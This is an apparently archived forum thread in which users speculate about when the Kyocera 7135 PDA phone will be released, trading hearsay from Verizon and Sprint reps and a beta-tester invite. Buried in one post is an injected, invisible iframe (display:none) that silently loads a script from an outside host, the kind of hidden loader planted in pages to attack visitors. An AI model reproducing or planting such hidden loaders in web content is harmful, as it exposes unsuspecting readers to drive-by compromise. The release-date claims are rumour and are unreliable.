What do you think?... will we be able to purchase this long-awaited smartphone this month?
I tried to turn this into a poll but I didn't have the patience to figure out how to do it.
I think we should start a SmartphoneSource pool with participants entering the exact date they predict the 7135 will become available. Winner to get a free stylus or something...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
I have put NO thought into this, but I'll go with October 31st. (if I was to put a little thought into it I might pick a Tuesday since that's when most stuff gets released.... but I don't think the wireless industry got that memo! )
Oh, and I'm not specifying a carrier... is that cheating?

If it does show up in Oct, I'd say that's cutting things a little tight...
I signed up on their website to be a beta tester, and just received an invite from the Consumer Test Division to be a Product Evaluator (yeah! ).... Orientation meeting is next week... dunno when it is planned to end...
To say the least, I can't wait to try out the phone, but it's hard to imagine it will be avail this month.....

I predict it will be available on Oct. 23rd. My contract with Verizon specifies that I can purchase a new phone on my account at the promotional price on Oct. 30. The 23rd is a week prior, allowing just enough time for the initial distribution of the 7135 sell out before I have the chance to buy it at the promo price. Murphy's law is King.
Oh man! Where are you located? What provider? I'm so envious...

Well damn! I wonder why they didn't pick moi...
I think just about everyone on this board has signed up at one time or another to be a beta tester. Most (if not all) of those requests go unanswered. What is the secret of your success?

I'm in San Diego County, which I'm sure is one reason why they sent an invite to me. They didn't indicate who the provider is/ would be, but they indicated that they will give out the phone with the provider already configured...
I'm really looking forward to getting to use the phone - it's by far the most attractive PDA/Phone combo out there for my needs! And, having used the orig Q-phone, i300 and 6035, I've got lots of ideas of what works and doesn't!
I really think location and plain old dumb luck help my acceptance into the beta program.... Now if I could only get that kinda luck on the lottery.......
I spoke to a rep at the Verizon store in Lynnwood Washington who can't wait till it comes out and he said it should be out at the end of Oct. That's two reps from Verizon with the same release date. Sounds promising.

Yep, it seems that for Verizon everything points to the end of this month or very early next. But until I hear more about Sprint's release date I'm not going to put too much thought into making a switch.

JJ and I talked with a Verizon rep at a Tech show today... she said officially the release date was in fact pushed back to November... but said not to hold our breath.... she said possibly by Christmas, but more realisticly first quarter......
Interestingly enough, the dude at the Sprint booth didn't seem to hardly know what a 7135 was..... (he was too busy flipping around his vision phone)...

lol... this is so crazy. Just when we think we're finally zeroing in on a date we're right back at square one. I think we'll probably know the release date when the first "I got my 7135" pops up on this board.
And I think that something would have to be seriously wrong for them to just miss the holiday season. That doesn't make sense. I'm going to have to get somebody that knows the process to tell me what it takes to get a phone from testing to release. I would think that Kyocera designs the phone with all of the testing in mind. I don't understand why it would take so long.

there are only a few of us "techno folks" who have heard of the 7135. the rest of the world does not even know what the 7135 is. in a way its good that we have folks to find this info out about new phones and post it so we can generate discussion on them, but its also bad because we will hear about phones before the FCC has even had a chance to test them..
so i dont think its taking long at all.. we have just been in "the know" for such a long time..
rememeber, there are probably quite a few phones, pagers, automibiles, etc that are in the final stages of ebing released that we dont even know about.. but some other forum or newsgroup does...
i still meet folks who have not heard of the 6035 OR i300 (im sure some of you have also...)
I called a Verizon store near me (MN) and they didnt even knowo what I was talking about. :tong3 ...did sound like a high school girl on the phone though.

just food for thought...
Is that supposed to make us feel any better about the situation?
I WANT MY 7135 NOW!!!!!!!
Ok, now I feel better
The T-Mobile Sidekick came out yesterday. I don't think PDA Buzz (or anyone else) started even talking about it until a little over a month or two ago. That's not fair!

I remember. As shown on the kyo web page, the 6035 is part of a "series". There was talk about a color 6055 which would have the same overall shape, but possibly thinner. Perhaps the leaked picture which web sites were asked to remove by kyo lawyers was kyo throwing us a bone, to give us something more impressive to look forward to than the 6055 we envisioned.
I'd find it pretty annoying to wait until 03. I use Eudora with advertising for my email, which means these little ads pop up all the time. No big deal except now the most common ad popping up is for the Kyocera 7135. To put that ad in rotation and not have the phone out until five months later would be just plain nasty.
